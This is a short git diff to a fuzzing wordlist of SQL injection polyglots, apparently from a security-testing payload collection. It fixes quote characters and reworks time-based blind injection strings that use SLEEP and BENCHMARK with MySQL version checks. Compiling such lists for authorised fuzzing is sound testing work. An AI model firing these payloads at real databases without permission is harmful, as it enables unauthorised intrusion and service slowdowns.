diff --git a/Fuzzing/Polyglots/SQLi-Polyglots.txt b/Fuzzing/Polyglots/SQLi-Polyglots.txt index 4cc9d80..9cf335c 100644 --- a/Fuzzing/Polyglots/SQLi-Polyglots.txt +++ b/Fuzzing/Polyglots/SQLi-Polyglots.txt @@ -1,2 +1,3 @@ SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/ -SELECT 1,2,IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),​SLEEP(1)))OR"*/ FROM some_table WHERE ex = ample +SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/ +IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),​SLEEP(1)))OR"*/